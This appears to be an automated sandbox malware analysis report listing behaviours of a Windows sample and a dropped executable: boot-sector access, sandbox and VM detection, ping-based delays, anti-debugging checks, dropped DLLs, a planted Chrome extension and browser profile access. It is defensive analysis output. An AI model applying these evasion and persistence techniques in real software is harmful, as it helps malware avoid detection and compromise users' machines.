Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\manifest.jsonJump to behavior

Boot Survival:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00445BD3 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Windows\SysWOW64\msiexec.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1612045890161.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_100204C0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_100204C0
Uses ping.exe to sleepShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_100204C0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_100204C0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe TID: 5436Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe TID: 4928Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe TID: 3920Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\fnhcdXEfus.exeFile opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0042A5EF __EH_prolog3_GS,_memset,GetTempPathW,FindFirstFileW,CompareFileTime,DeleteFileW,FindNextFileW,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004594D0 GetModuleHandleW,GetProcAddress,GetSystemInfo,
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.271537033.0000000003EFD000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284702540.0000000003F37000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation CounterSystemACPI
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.245376573.0000000002A41000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000003.247321967.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.270931402.0000000003F13000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation Counter}V\
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.274136124.00000000007A8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWZ
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.270949659.0000000003EF1000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.270931402.0000000003F13000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.274971409.0000000002DED000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation Counter
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.245393677.0000000002A6D000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.274971409.0000000002DED000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000003.261822382.0000000000799000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.271268505.0000000003EF7000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.273731431.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware Virtual disk 2.0
Source: ecvB803.tmp.11.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20200930T150347Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=4f67defbf95d422b8052c59b06ee26b9&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663703&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663703&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.273731431.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.271268505.0000000003EF7000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284726946.0000000003F64000.00000004.00000001.sdmpBinary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPIxu
Source: C:\Users\user\AppData\Roaming\1612045890161.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,
Hides threads from debuggersShow sources
Source: C:\Users\user\Desktop\fnhcdXEfus.exeThread information set: HideFromDebugger
Source: C:\Users\user\Desktop\fnhcdXEfus.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\fnhcdXEfus.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\fnhcdXEfus.exeProcess queried: DebugObjectHandle
Source: C:\Users\user\Desktop\fnhcdXEfus.exeProcess queried: DebugFlags
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0044D67E EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0044D67E EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00440314 __EH_prolog3_GS,LoadLibraryW,GetProcAddress,#17,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00446490 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00419AD9 GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,_strlen,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,ReadFile,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0044A9CB SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0044A9EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,
